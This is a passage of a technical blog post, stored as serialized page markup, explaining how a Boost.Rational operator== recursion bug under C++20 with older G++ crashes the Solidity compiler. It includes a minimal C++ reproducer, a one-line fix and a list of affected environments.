rational\n",{"type":28,"tag":116,"props":90811,"children":90812},{"class":245,"line":361},[90813],{"type":28,"tag":116,"props":90814,"children":90815},{"style":266},[90816],{"type":33,"value":10547},{"type":28,"tag":116,"props":90818,"children":90819},{"class":245,"line":387},[90820],{"type":28,"tag":116,"props":90821,"children":90822},{"style":266},[90823],{"type":33,"value":20003},{"type":28,"tag":116,"props":90825,"children":90826},{"class":245,"line":400},[90827],{"type":28,"tag":116,"props":90828,"children":90829},{"style":376},[90830],{"type":33,"value":90094},{"type":28,"tag":116,"props":90832,"children":90833},{"class":245,"line":614},[90834],{"type":28,"tag":116,"props":90835,"children":90836},{"style":266},[90837],{"type":33,"value":20003},{"type":28,"tag":116,"props":90839,"children":90840},{"class":245,"line":631},[90841],{"type":28,"tag":116,"props":90842,"children":90843},{"style":266},[90844],{"type":33,"value":61405},{"type":28,"tag":116,"props":90846,"children":90847},{"class":245,"line":665},[90848,90852,90856,90860,90864],{"type":28,"tag":116,"props":90849,"children":90850},{"style":376},[90851],{"type":33,"value":90102},{"type":28,"tag":116,"props":90853,"children":90854},{"style":266},[90855],{"type":33,"value":8391},{"type":28,"tag":116,"props":90857,"children":90858},{"style":376},[90859],{"type":33,"value":70029},{"type":28,"tag":116,"props":90861,"children":90862},{"style":339},[90863],{"type":33,"value":5590},{"type":28,"tag":116,"props":90865,"children":90866},{"style":266},[90867],{"type":33,"value":506},{"type":28,"tag":116,"props":90869,"children":90870},{"class":245,"line":713},[90871,90876,90880,90885,90889,90893,90897,90902,90906,90910,90914,90918,90922,90926,90931,90935,90939,90943,90947,90951],{"type":28,"tag":116,"props":90872,"children":90873},{"style":266},[90874],{"type":33,"value":90875},"    BOOST_CONSTEXPR ",{"type":28,"tag":116,"props":90877,"children":90878},{"style":376},[90879],{"type":33,"value":90061},{"type":28,"tag":116,"props":90881,"children":90882},{"style":266},[90883],{"type":33,"value":90884}," boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003C",{"type":28,"tag":116,"props":90886,"children":90887},{"style":339},[90888],{"type":33,"value":5659},{"type":28,"tag":116,"props":90890,"children":90891},{"style":266},[90892],{"type":33,"value":825},{"type":28,"tag":116,"props":90894,"children":90895},{"style":339},[90896],{"type":33,"value":90295},{"type":28,"tag":116,"props":90898,"children":90899},{"style":266},[90900],{"type":33,"value":90901},">::",{"type":28,"tag":116,"props":90903,"children":90904},{"style":339},[90905],{"type":33,"value":38773},{"type":28,"tag":116,"props":90907,"children":90908},{"style":266},[90909],{"type":33,"value":825},{"type":28,"tag":116,"props":90911,"children":90912},{"style":376},[90913],{"type":33,"value":29341},{"type":28,"tag":116,"props":90915,"children":90916},{"style":266},[90917],{"type":33,"value":90901},{"type":28,"tag":116,"props":90919,"children":90920},{"style":339},[90921],{"type":33,"value":32394},{"type":28,"tag":116,"props":90923,"children":90924},{"style":376},[90925],{"type":33,"value":90130},{"type":28,"tag":116,"props":90927,"children":90928},{"style":266},[90929],{"type":33,"value":90930},"== (",{"type":28,"tag":116,"props":90932,"children":90933},{"style":376},[90934],{"type":33,"value":9323},{"type":28,"tag":116,"props":90936,"children":90937},{"style":339},[90938],{"type":33,"value":5590},{"type":28,"tag":116,"props":90940,"children":90941},{"style":376},[90942],{"type":33,"value":2780},{"type":28,"tag":116,"props":90944,"children":90945},{"style":272},[90946],{"type":33,"value":3068},{"type":28,"tag":116,"props":90948,"children":90949},{"style":266},[90950],{"type":33,"value":1609},{"type":28,"tag":116,"props":90952,"children":90953},{"style":376},[90954],{"type":33,"value":90955},"const\n",{"type":28,"tag":116,"props":90957,"children":90958},{"class":245,"line":750},[90959],{"type":28,"tag":116,"props":90960,"children":90961},{"style":266},[90962],{"type":33,"value":28842},{"type":28,"tag":116,"props":90964,"children":90965},{"class":245,"line":779},[90966,90971,90976,90980,90984,90988,90992,90996,91000,91005,91009],{"type":28,"tag":116,"props":90967,"children":90968},{"style":260},[90969],{"type":33,"value":90970},"       return",{"type":28,"tag":116,"props":90972,"children":90973},{"style":266},[90974],{"type":33,"value":90975}," ((den ",{"type":28,"tag":116,"props":90977,"children":90978},{"style":370},[90979],{"type":33,"value":2340},{"type":28,"tag":116,"props":90981,"children":90982},{"style":282},[90983],{"type":33,"value":90066},{"type":28,"tag":116,"props":90985,"children":90986},{"style":266},[90987],{"type":33,"value":313},{"type":28,"tag":116,"props":90989,"children":90990},{"style":350},[90991],{"type":33,"value":1824},{"type":28,"tag":116,"props":90993,"children":90994},{"style":266},[90995],{"type":33,"value":2390},{"type":28,"tag":116,"props":90997,"children":90998},{"style":370},[90999],{"type":33,"value":72815},{"type":28,"tag":116,"props":91001,"children":91002},{"style":266},[91003],{"type":33,"value":91004}," (num ",{"type":28,"tag":116,"props":91006,"children":91007},{"style":370},[91008],{"type":33,"value":2340},{"type":28,"tag":116,"props":91010,"children":91011},{"style":266},[91012],{"type":33,"value":91013}," i));\n",{"type":28,"tag":116,"props":91015,"children":91016},{"class":245,"line":796},[91017],{"type":28,"tag":116,"props":91018,"children":91019},{"style":266},[91020],{"type":33,"value":3025},{"type":28,"tag":116,"props":91022,"children":91023},{"class":245,"line":847},[91024],{"type":28,"tag":116,"props":91025,"children":91026},{"style":266},[91027],{"type":33,"value":20003},{"type":28,"tag":116,"props":91029,"children":91030},{"class":245,"line":898},[91031],{"type":28,"tag":116,"props":91032,"children":91033},{"style":266},[91034],{"type":33,"value":406},{"type":28,"tag":116,"props":91036,"children":91037},{"class":245,"line":907},[91038],{"type":28,"tag":116,"props":91039,"children":91040},{"emptyLinePlaceholder":19},[91041],{"type":33,"value":1044},{"type":28,"tag":116,"props":91043,"children":91044},{"class":245,"line":981},[91045,91049,91053,91057,91061,91065,91069,91073],{"type":28,"tag":116,"props":91046,"children":91047},{"style":376},[91048],{"type":33,"value":65836},{"type":28,"tag":116,"props":91050,"children":91051},{"style":266},[91052],{"type":33,"value":8391},{"type":28,"tag":116,"props":91054,"children":91055},{"style":376},[91056],{"type":33,"value":70029},{"type":28,"tag":116,"props":91058,"children":91059},{"style":339},[91060],{"type":33,"value":90247},{"type":28,"tag":116,"props":91062,"children":91063},{"style":266},[91064],{"type":33,"value":825},{"type":28,"tag":116,"props":91066,"children":91067},{"style":376},[91068],{"type":33,"value":70029},{"type":28,"tag":116,"props":91070,"children":91071},{"style":339},[91072],{"type":33,"value":90066},{"type":28,"tag":116,"props":91074,"children":91075},{"style":266},[91076],{"type":33,"value":506},{"type":28,"tag":116,"props":91078,"children":91079},{"class":245,"line":1011},[91080],{"type":28,"tag":116,"props":91081,"children":91082},{"style":266},[91083],{"type":33,"value":91084},"BOOST_CONSTEXPR\n",{"type":28,"tag":116,"props":91086,"children":91087},{"class":245,"line":1029},[91088,91093,91098,91103,91108],{"type":28,"tag":116,"props":91089,"children":91090},{"style":376},[91091],{"type":33,"value":91092},"inline",{"type":28,"tag":116,"props":91094,"children":91095},{"style":376},[91096],{"type":33,"value":91097}," typename",{"type":28,"tag":116,"props":91099,"children":91100},{"style":266},[91101],{"type":33,"value":91102}," boost::",{"type":28,"tag":116,"props":91104,"children":91105},{"style":339},[91106],{"type":33,"value":91107},"enable_if_c",{"type":28,"tag":116,"props":91109,"children":91110},{"style":370},[91111],{"type":33,"value":91112}," \u003C\n",{"type":28,"tag":116,"props":91114,"children":91115},{"class":245,"line":1038},[91116,91121,91126,91130,91134,91139,91143,91147],{"type":28,"tag":116,"props":91117,"children":91118},{"style":266},[91119],{"type":33,"value":91120},"   rational_detail::is_compatible_integer\u003C",{"type":28,"tag":116,"props":91122,"children":91123},{"style":339},[91124],{"type":33,"value":91125},"Arg",{"type":28,"tag":116,"props":91127,"children":91128},{"style":266},[91129],{"type":33,"value":825},{"type":28,"tag":116,"props":91131,"children":91132},{"style":339},[91133],{"type":33,"value":90295},{"type":28,"tag":116,"props":91135,"children":91136},{"style":266},[91137],{"type":33,"value":91138},">::value, ",{"type":28,"tag":116,"props":91140,"children":91141},{"style":376},[91142],{"type":33,"value":29341},{"type":28,"tag":116,"props":91144,"children":91145},{"style":370},[91146],{"type":33,"value":645},{"type":28,"tag":116,"props":91148,"children":91149},{"style":266},[91150],{"type":33,"value":91151},"::type\n",{"type":28,"tag":116,"props":91153,"children":91154},{"class":245,"line":1047},[91155,91160,91165,91169,91173,91177,91181,91185,91189,91193,91197,91201,91205,91209,91213],{"type":28,"tag":116,"props":91156,"children":91157},{"style":376},[91158],{"type":33,"value":91159},"   operator",{"type":28,"tag":116,"props":91161,"children":91162},{"style":266},[91163],{"type":33,"value":91164}," == (",{"type":28,"tag":116,"props":91166,"children":91167},{"style":376},[91168],{"type":33,"value":9323},{"type":28,"tag":116,"props":91170,"children":91171},{"style":339},[91172],{"type":33,"value":90247},{"type":28,"tag":116,"props":91174,"children":91175},{"style":376},[91176],{"type":33,"value":2780},{"type":28,"tag":116,"props":91178,"children":91179},{"style":272},[91180],{"type":33,"value":90328},{"type":28,"tag":116,"props":91182,"children":91183},{"style":266},[91184],{"type":33,"value":825},{"type":28,"tag":116,"props":91186,"children":91187},{"style":376},[91188],{"type":33,"value":9323},{"type":28,"tag":116,"props":91190,"children":91191},{"style":339},[91192],{"type":33,"value":90082},{"type":28,"tag":116,"props":91194,"children":91195},{"style":266},[91196],{"type":33,"value":514},{"type":28,"tag":116,"props":91198,"children":91199},{"style":339},[91200],{"type":33,"value":90295},{"type":28,"tag":116,"props":91202,"children":91203},{"style":266},[91204],{"type":33,"value":645},{"type":28,"tag":116,"props":91206,"children":91207},{"style":376},[91208],{"type":33,"value":2780},{"type":28,"tag":116,"props":91210,"children":91211},{"style":272},[91212],{"type":33,"value":89454},{"type":28,"tag":116,"props":91214,"children":91215},{"style":266},[91216],{"type":33,"value":2830},{"type":28,"tag":116,"props":91218,"children":91219},{"class":245,"line":1071},[91220],{"type":28,"tag":116,"props":91221,"children":91222},{"style":266},[91223],{"type":33,"value":10547},{"type":28,"tag":116,"props":91225,"children":91226},{"class":245,"line":1137},[91227,91231,91235,91239],{"type":28,"tag":116,"props":91228,"children":91229},{"style":260},[91230],{"type":33,"value":38977},{"type":28,"tag":116,"props":91232,"children":91233},{"style":266},[91234],{"type":33,"value":16426},{"type":28,"tag":116,"props":91236,"children":91237},{"style":370},[91238],{"type":33,"value":2340},{"type":28,"tag":116,"props":91240,"children":91241},{"style":266},[91242],{"type":33,"value":91243}," b; \n",{"type":28,"tag":116,"props":91245,"children":91246},{"class":245,"line":1181},[91247],{"type":28,"tag":116,"props":91248,"children":91249},{"style":266},[91250],{"type":33,"value":406},{"type":28,"tag":29,"props":91252,"children":91253},{},[91254,91256,91262],{"type":33,"value":91255},"This was designed under C++17 semantics. Back then, ",{"type":28,"tag":98,"props":91257,"children":91259},{"className":91258},[],[91260],{"type":33,"value":91261},"rhs == lhs",{"type":33,"value":91263}," would fall back to member overloads if available. All good.",{"type":28,"tag":29,"props":91265,"children":91266},{},[91267,91269,91274,91275,91281],{"type":33,"value":91268},"But under ",{"type":28,"tag":98,"props":91270,"children":91272},{"className":91271},[],[91273],{"type":33,"value":89819},{"type":33,"value":21167},{"type":28,"tag":98,"props":91276,"children":91278},{"className":91277},[],[91279],{"type":33,"value":91280},"G++ \u003C 14",{"type":33,"value":4160},{"type":28,"tag":2108,"props":91283,"children":91284},{},[91285,91290,91295,91300],{"type":28,"tag":459,"props":91286,"children":91287},{},[91288],{"type":33,"value":91289},"G++ incorrectly chooses this non-member operator first",{"type":28,"tag":459,"props":91291,"children":91292},{},[91293],{"type":33,"value":91294},"C++20 reverses the comparison",{"type":28,"tag":459,"props":91296,"children":91297},{},[91298],{"type":33,"value":91299},"Which calls the same function again with arguments flipped",{"type":28,"tag":459,"props":91301,"children":91302},{},[91303],{"type":33,"value":91304},"And so on...",{"type":28,"tag":29,"props":91306,"children":91307},{},[91308,91310,91315],{"type":33,"value":91309},"This creates ",{"type":28,"tag":4995,"props":91311,"children":91312},{},[91313],{"type":33,"value":91314},"infinite recursion",{"type":33,"value":141},{"type":28,"tag":29,"props":91317,"children":91318},{},[91319],{"type":33,"value":91320},"A minimal example:",{"type":28,"tag":234,"props":91322,"children":91324},{"code":91323,"language":28767,"meta":7,"className":28765,"style":7},"// g++ -std=c++20 -o crash main.cpp && ./crash\n#include \u003Cboost/rational.hpp>\n\nint main() {\n    boost::rational\u003Cint> r;\n    return r == 0;\n}\n",[91325],{"type":28,"tag":98,"props":91326,"children":91327},{"__ignoreMap":7},[91328,91336,91348,91355,91370,91394,91417],{"type":28,"tag":116,"props":91329,"children":91330},{"class":245,"line":246},[91331],{"type":28,"tag":116,"props":91332,"children":91333},{"style":250},[91334],{"type":33,"value":91335},"// g++ -std=c++20 -o crash main.cpp && ./crash\n",{"type":28,"tag":116,"props":91337,"children":91338},{"class":245,"line":256},[91339,91343],{"type":28,"tag":116,"props":91340,"children":91341},{"style":260},[91342],{"type":33,"value":90033},{"type":28,"tag":116,"props":91344,"children":91345},{"style":563},[91346],{"type":33,"value":91347}," \u003Cboost/rational.hpp>\n",{"type":28,"tag":116,"props":91349,"children":91350},{"class":245,"line":293},[91351],{"type":28,"tag":116,"props":91352,"children":91353},{"emptyLinePlaceholder":19},[91354],{"type":33,"value":1044},{"type":28,"tag":116,"props":91356,"children":91357},{"class":245,"line":361},[91358,91362,91366],{"type":28,"tag":116,"props":91359,"children":91360},{"style":376},[91361],{"type":33,"value":18710},{"type":28,"tag":116,"props":91363,"children":91364},{"style":282},[91365],{"type":33,"value":1063},{"type":28,"tag":116,"props":91367,"children":91368},{"style":266},[91369],{"type":33,"value":1068},{"type":28,"tag":116,"props":91371,"children":91372},{"class":245,"line":387},[91373,91378,91382,91386,91390],{"type":28,"tag":116,"props":91374,"children":91375},{"style":266},[91376],{"type":33,"value":91377},"    boost::rational",{"type":28,"tag":116,"props":91379,"children":91380},{"style":370},[91381],{"type":33,"value":514},{"type":28,"tag":116,"props":91383,"children":91384},{"style":376},[91385],{"type":33,"value":18710},{"type":28,"tag":116,"props":91387,"children":91388},{"style":370},[91389],{"type":33,"value":645},{"type":28,"tag":116,"props":91391,"children":91392},{"style":266},[91393],{"type":33,"value":90426},{"type":28,"tag":116,"props":91395,"children":91396},{"class":245,"line":400},[91397,91401,91405,91409,91413],{"type":28,"tag":116,"props":91398,"children":91399},{"style":260},[91400],{"type":33,"value":393},{"type":28,"tag":116,"props":91402,"children":91403},{"style":266},[91404],{"type":33,"value":90438},{"type":28,"tag":116,"props":91406,"children":91407},{"style":370},[91408],{"type":33,"value":2340},{"type":28,"tag":116,"props":91410,"children":91411},{"style":350},[91412],{"type":33,"value":2718},{"type":28,"tag":116,"props":91414,"children":91415},{"style":266},[91416],{"type":33,"value":384},{"type":28,"tag":116,"props":91418,"children":91419},{"class":245,"line":614},[91420],{"type":28,"tag":116,"props":91421,"children":91422},{"style":266},[91423],{"type":33,"value":406},{"type":28,"tag":29,"props":91425,"children":91426},{},[91427],{"type":33,"value":91428},"Expected output: nothing.",{"type":28,"tag":29,"props":91430,"children":91431},{},[91432],{"type":33,"value":91433},"Actual: segmentation fault (stack overflow).",{"type":28,"tag":29,"props":91435,"children":91436},{},[91437,91439,91446],{"type":33,"value":91438},"This exact pattern was ",{"type":28,"tag":87,"props":91440,"children":91443},{"href":91441,"rel":91442},"https://github.com/boostorg/rational/issues/43",[91],[91444],{"type":33,"value":91445},"reported and fixed in Boost rational",{"type":33,"value":91447},", but only in version 1.75+.",{"type":28,"tag":29,"props":91449,"children":91450},{},[91451],{"type":33,"value":91452},"Here’s the one-line fix:",{"type":28,"tag":234,"props":91454,"children":91456},{"code":91455,"language":39982,"meta":7,"className":39980,"style":7},"template \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n-     return a == b;\n+     return a.operator==(b);\n}\n",[91457],{"type":28,"tag":98,"props":91458,"children":91459},{"__ignoreMap":7},[91460,91468,91475,91483,91491,91499,91506,91514,91522],{"type":28,"tag":116,"props":91461,"children":91462},{"class":245,"line":246},[91463],{"type":28,"tag":116,"props":91464,"children":91465},{"style":266},[91466],{"type":33,"value":91467},"template \u003Cclass Arg, class IntType>\n",{"type":28,"tag":116,"props":91469,"children":91470},{"class":245,"line":256},[91471],{"type":28,"tag":116,"props":91472,"children":91473},{"style":266},[91474],{"type":33,"value":91084},{"type":28,"tag":116,"props":91476,"children":91477},{"class":245,"line":293},[91478],{"type":28,"tag":116,"props":91479,"children":91480},{"style":266},[91481],{"type":33,"value":91482},"inline typename boost::enable_if_c \u003C\n",{"type":28,"tag":116,"props":91484,"children":91485},{"class":245,"line":361},[91486],{"type":28,"tag":116,"props":91487,"children":91488},{"style":266},[91489],{"type":33,"value":91490},"   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n",{"type":28,"tag":116,"props":91492,"children":91493},{"class":245,"line":387},[91494],{"type":28,"tag":116,"props":91495,"children":91496},{"style":266},[91497],{"type":33,"value":91498},"   operator == (const Arg& b, const rational\u003CIntType>& a)\n",{"type":28,"tag":116,"props":91500,"children":91501},{"class":245,"line":400},[91502],{"type":28,"tag":116,"props":91503,"children":91504},{"style":266},[91505],{"type":33,"value":10547},{"type":28,"tag":116,"props":91507,"children":91508},{"class":245,"line":614},[91509],{"type":28,"tag":116,"props":91510,"children":91511},{"style":563},[91512],{"type":33,"value":91513},"-     return a == b;\n",{"type":28,"tag":116,"props":91515,"children":91516},{"class":245,"line":631},[91517],{"type":28,"tag":116,"props":91518,"children":91519},{"style":350},[91520],{"type":33,"value":91521},"+     return a.operator==(b);\n",{"type":28,"tag":116,"props":91523,"children":91524},{"class":245,"line":665},[91525],{"type":28,"tag":116,"props":91526,"children":91527},{"style":266},[91528],{"type":33,"value":406},{"type":28,"tag":29,"props":91530,"children":91531},{},[91532,91534,91539,91541,91546],{"type":33,"value":91533},"Instead of calling ",{"type":28,"tag":98,"props":91535,"children":91537},{"className":91536},[],[91538],{"type":33,"value":89865},{"type":33,"value":91540}," — which triggers overload resolution again — the patched version directly calls the member function ",{"type":28,"tag":98,"props":91542,"children":91544},{"className":91543},[],[91545],{"type":33,"value":89873},{"type":33,"value":141},{"type":28,"tag":29,"props":91548,"children":91549},{},[91550],{"type":33,"value":91551},"This prevents C++20 from triggering recursive rewrites.",{"type":28,"tag":18457,"props":91553,"children":91554},{},[],{"type":28,"tag":63,"props":91556,"children":91558},{"id":91557},"part-iv-how-this-breaks-solidity",[91559],{"type":33,"value":91560},"Part IV: How This Breaks Solidity",{"type":28,"tag":29,"props":91562,"children":91563},{},[91564,91566,91571],{"type":33,"value":91565},"The Solidity codebase uses ",{"type":28,"tag":98,"props":91567,"children":91569},{"className":91568},[],[91570],{"type":33,"value":89720},{"type":33,"value":91572}," to represent certain compile-time constant expressions.",{"type":28,"tag":29,"props":91574,"children":91575},{},[91576,91578,91584],{"type":33,"value":91577},"One snippet that can trigger this issue appears in ",{"type":28,"tag":98,"props":91579,"children":91581},{"className":91580},[],[91582],{"type":33,"value":91583},"DeclarationTypeChecker::endVisit",{"type":33,"value":4160},{"type":28,"tag":234,"props":91586,"children":91588},{"code":91587,"language":28767,"meta":7,"className":28765,"style":7},"if (Expression const* length = _typeName.length()) {\n    std::optional\u003Crational> lengthValue;\n\n    if (length->annotation().type && length->annotation().type->category() == Type::Category::RationalNumber)\n        ...\n    else if (std::optional\u003CConstantEvaluator::TypedRational> value = ConstantEvaluator::evaluate(...))\n        lengthValue = value->value;\n\n    if (!lengthValue)\n        ...\n    else if (*lengthValue == 0)  // \u003C-- Infinite recursion happens here\n        ...\n}\n",[91589],{"type":28,"tag":98,"props":91590,"children":91591},{"__ignoreMap":7},[91592,91638,91663,91670,91748,91755,91808,91836,91843,91863,91870,91910,91917],{"type":28,"tag":116,"props":91593,"children":91594},{"class":245,"line":246},[91595,91599,91604,91608,91612,91617,91621,91626,91630,91634],{"type":28,"tag":116,"props":91596,"children":91597},{"style":260},[91598],{"type":33,"value":263},{"type":28,"tag":116,"props":91600,"children":91601},{"style":266},[91602],{"type":33,"value":91603}," (Expression ",{"type":28,"tag":116,"props":91605,"children":91606},{"style":376},[91607],{"type":33,"value":9323},{"type":28,"tag":116,"props":91609,"children":91610},{"style":370},[91611],{"type":33,"value":4240},{"type":28,"tag":116,"props":91613,"children":91614},{"style":266},[91615],{"type":33,"value":91616}," length ",{"type":28,"tag":116,"props":91618,"children":91619},{"style":370},[91620],{"type":33,"value":373},{"type":28,"tag":116,"props":91622,"children":91623},{"style":272},[91624],{"type":33,"value":91625}," _typeName",{"type":28,"tag":116,"props":91627,"children":91628},{"style":266},[91629],{"type":33,"value":141},{"type":28,"tag":116,"props":91631,"children":91632},{"style":282},[91633],{"type":33,"value":8176},{"type":28,"tag":116,"props":91635,"children":91636},{"style":266},[91637],{"type":33,"value":290},{"type":28,"tag":116,"props":91639,"children":91640},{"class":245,"line":256},[91641,91646,91650,91654,91658],{"type":28,"tag":116,"props":91642,"children":91643},{"style":266},[91644],{"type":33,"value":91645},"    std::optional",{"type":28,"tag":116,"props":91647,"children":91648},{"style":370},[91649],{"type":33,"value":514},{"type":28,"tag":116,"props":91651,"children":91652},{"style":266},[91653],{"type":33,"value":90724},{"type":28,"tag":116,"props":91655,"children":91656},{"style":370},[91657],{"type":33,"value":645},{"type":28,"tag":116,"props":91659,"children":91660},{"style":266},[91661],{"type":33,"value":91662}," lengthValue;\n",{"type":28,"tag":116,"props":91664,"children":91665},{"class":245,"line":293},[91666],{"type":28,"tag":116,"props":91667,"children":91668},{"emptyLinePlaceholder":19},[91669],{"type":33,"value":1044},{"type":28,"tag":116,"props":91671,"children":91672},{"class":245,"line":361},[91673,91677,91681,91685,91689,91693,91697,91701,91705,91710,91714,91718,91722,91726,91730,91735,91739,91743],{"type":28,"tag":116,"props":91674,"children":91675},{"style":260},[91676],{"type":33,"value":11947},{"type":28,"tag":116,"props":91678,"children":91679},{"style":266},[91680],{"type":33,"value":269},{"type":28,"tag":116,"props":91682,"children":91683},{"style":272},[91684],{"type":33,"value":8176},{"type":28,"tag":116,"props":91686,"children":91687},{"style":266},[91688],{"type":33,"value":13423},{"type":28,"tag":116,"props":91690,"children":91691},{"style":282},[91692],{"type":33,"value":29819},{"type":28,"tag":116,"props":91694,"children":91695},{"style":266},[91696],{"type":33,"value":1540},{"type":28,"tag":116,"props":91698,"children":91699},{"style":272},[91700],{"type":33,"value":32394},{"type":28,"tag":116,"props":91702,"children":91703},{"style":370},[91704],{"type":33,"value":13851},{"type":28,"tag":116,"props":91706,"children":91707},{"style":272},[91708],{"type":33,"value":91709}," length",{"type":28,"tag":116,"props":91711,"children":91712},{"style":266},[91713],{"type":33,"value":13423},{"type":28,"tag":116,"props":91715,"children":91716},{"style":282},[91717],{"type":33,"value":29819},{"type":28,"tag":116,"props":91719,"children":91720},{"style":266},[91721],{"type":33,"value":1540},{"type":28,"tag":116,"props":91723,"children":91724},{"style":272},[91725],{"type":33,"value":32394},{"type":28,"tag":116,"props":91727,"children":91728},{"style":266},[91729],{"type":33,"value":13423},{"type":28,"tag":116,"props":91731,"children":91732},{"style":282},[91733],{"type":33,"value":91734},"category",{"type":28,"tag":116,"props":91736,"children":91737},{"style":266},[91738],{"type":33,"value":13709},{"type":28,"tag":116,"props":91740,"children":91741},{"style":370},[91742],{"type":33,"value":2340},{"type":28,"tag":116,"props":91744,"children":91745},{"style":266},[91746],{"type":33,"value":91747}," Type::Category::RationalNumber)\n",{"type":28,"tag":116,"props":91749,"children":91750},{"class":245,"line":387},[91751],{"type":28,"tag":116,"props":91752,"children":91753},{"style":266},[91754],{"type":33,"value":81461},{"type":28,"tag":116,"props":91756,"children":91757},{"class":245,"line":400},[91758,91763,91767,91772,91776,91781,91785,91790,91794,91799,91803],{"type":28,"tag":116,"props":91759,"children":91760},{"style":260},[91761],{"type":33,"value":91762},"    else",{"type":28,"tag":116,"props":91764,"children":91765},{"style":260},[91766],{"type":33,"value":15449},{"type":28,"tag":116,"props":91768,"children":91769},{"style":266},[91770],{"type":33,"value":91771}," (std::optional",{"type":28,"tag":116,"props":91773,"children":91774},{"style":370},[91775],{"type":33,"value":514},{"type":28,"tag":116,"props":91777,"children":91778},{"style":266},[91779],{"type":33,"value":91780},"ConstantEvaluator::TypedRational",{"type":28,"tag":116,"props":91782,"children":91783},{"style":370},[91784],{"type":33,"value":645},{"type":28,"tag":116,"props":91786,"children":91787},{"style":266},[91788],{"type":33,"value":91789}," value ",{"type":28,"tag":116,"props":91791,"children":91792},{"style":370},[91793],{"type":33,"value":373},{"type":28,"tag":116,"props":91795,"children":91796},{"style":266},[91797],{"type":33,"value":91798}," ConstantEvaluator::",{"type":28,"tag":116,"props":91800,"children":91801},{"style":282},[91802],{"type":33,"value":37628},{"type":28,"tag":116,"props":91804,"children":91805},{"style":266},[91806],{"type":33,"value":91807},"(...))\n",{"type":28,"tag":116,"props":91809,"children":91810},{"class":245,"line":614},[91811,91816,91820,91824,91828,91832],{"type":28,"tag":116,"props":91812,"children":91813},{"style":266},[91814],{"type":33,"value":91815},"        lengthValue ",{"type":28,"tag":116,"props":91817,"children":91818},{"style":370},[91819],{"type":33,"value":373},{"type":28,"tag":116,"props":91821,"children":91822},{"style":272},[91823],{"type":33,"value":32151},{"type":28,"tag":116,"props":91825,"children":91826},{"style":266},[91827],{"type":33,"value":13423},{"type":28,"tag":116,"props":91829,"children":91830},{"style":272},[91831],{"type":33,"value":38773},{"type":28,"tag":116,"props":91833,"children":91834},{"style":266},[91835],{"type":33,"value":384},{"type":28,"tag":116,"props":91837,"children":91838},{"class":245,"line":631},[91839],{"type":28,"tag":116,"props":91840,"children":91841},{"emptyLinePlaceholder":19},[91842],{"type":33,"value":1044},{"type":28,"tag":116,"props":91844,"children":91845},{"class":245,"line":665},[91846,91850,91854,91858],{"type":28,"tag":116,"props":91847,"children":91848},{"style":260},[91849],{"type":33,"value":11947},{"type":28,"tag":116,"props":91851,"children":91852},{"style":266},[91853],{"type":33,"value":269},{"type":28,"tag":116,"props":91855,"children":91856},{"style":370},[91857],{"type":33,"value":20285},{"type":28,"tag":116,"props":91859,"children":91860},{"style":266},[91861],{"type":33,"value":91862},"lengthValue)\n",{"type":28,"tag":116,"props":91864,"children":91865},{"class":245,"line":713},[91866],{"type":28,"tag":116,"props":91867,"children":91868},{"style":266},[91869],{"type":33,"value":81461},{"type":28,"tag":116,"props":91871,"children":91872},{"class":245,"line":750},[91873,91877,91881,91885,91889,91893,91897,91901,91905],{"type":28,"tag":116,"props":91874,"children":91875},{"style":260},[91876],{"type":33,"value":91762},{"type":28,"tag":116,"props":91878,"children":91879},{"style":260},[91880],{"type":33,"value":15449},{"type":28,"tag":116,"props":91882,"children":91883},{"style":266},[91884],{"type":33,"value":269},{"type":28,"tag":116,"props":91886,"children":91887},{"style":370},[91888],{"type":33,"value":4240},{"type":28,"tag":116,"props":91890,"children":91891},{"style":266},[91892],{"type":33,"value":89696},{"type":28,"tag":116,"props":91894,"children":91895},{"style":370},[91896],{"type":33,"value":2340},{"type":28,"tag":116,"props":91898,"children":91899},{"style":350},[91900],{"type":33,"value":2718},{"type":28,"tag":116,"props":91902,"children":91903},{"style":266},[91904],{"type":33,"value":1829},{"type":28,"tag":116,"props":91906,"children":91907},{"style":250},[91908],{"type":33,"value":91909},"  // \u003C-- Infinite recursion happens here\n",{"type":28,"tag":116,"props":91911,"children":91912},{"class":245,"line":779},[91913],{"type":28,"tag":116,"props":91914,"children":91915},{"style":266},[91916],{"type":33,"value":81461},{"type":28,"tag":116,"props":91918,"children":91919},{"class":245,"line":796},[91920],{"type":28,"tag":116,"props":91921,"children":91922},{"style":266},[91923],{"type":33,"value":406},{"type":28,"tag":29,"props":91925,"children":91926},{},[91927],{"type":33,"value":91928},"Under normal circumstances, this expression is benign. But:",{"type":28,"tag":2108,"props":91930,"children":91931},{},[91932,91937,91942],{"type":28,"tag":459,"props":91933,"children":91934},{},[91935],{"type":33,"value":91936},"G++ \u003C 14 wrongly prefers Boost's non-member operator",{"type":28,"tag":459,"props":91938,"children":91939},{},[91940],{"type":33,"value":91941},"C++20 reverses the arguments",{"type":28,"tag":459,"props":91943,"children":91944},{},[91945],{"type":33,"value":91946},"The non-member operator recursively calls itself",{"type":28,"tag":29,"props":91948,"children":91949},{},[91950],{"type":33,"value":91951},"💥: segmentation fault.",{"type":28,"tag":18457,"props":91953,"children":91954},{},[],{"type":28,"tag":63,"props":91956,"children":91958},{"id":91957},"part-v-what-environments-are-affected",[91959],{"type":33,"value":91960},"Part V: What Environments are Affected?",{"type":28,"tag":29,"props":91962,"children":91963},{},[91964],{"type":33,"value":91965},"If a system uses any of the following:",{"type":28,"tag":2108,"props":91967,"children":91968},{},[91969,91974,91979],{"type":28,"tag":459,"props":91970,"children":91971},{},[91972],{"type":33,"value":91973},"G++ \u003C 14 (e.g., Ubuntu 22.04 uses 11.4)",{"type":28,"tag":459,"props":91975,"children":91976},{},[91977],{"type":33,"value":91978},"Boost \u003C 1.75 (e.g., 1.74 ships with Ubuntu)",{"type":28,"tag":459,"props":91980,"children":91981},{},[91982],{"type":33,"value":91983},"C++20 enabled (default in recent Solidity builds)",{"type":28,"tag":29,"props":91985,"children":91986},{},[91987,91989,91994,91996,92002],{"type":33,"value":91988},"They will encounter this crash ",{"type":28,"tag":4995,"props":91990,"children":91991},{},[91992],{"type":33,"value":91993},"as soon as",{"type":33,"value":91995}," it processes a Solidity source with a length expression like ",{"type":28,"tag":98,"props":91997,"children":91999},{"className":91998},[],[92000],{"type":33,"value":92001},"T[0]",{"type":33,"value":92003}," or anything involving compile-time rational 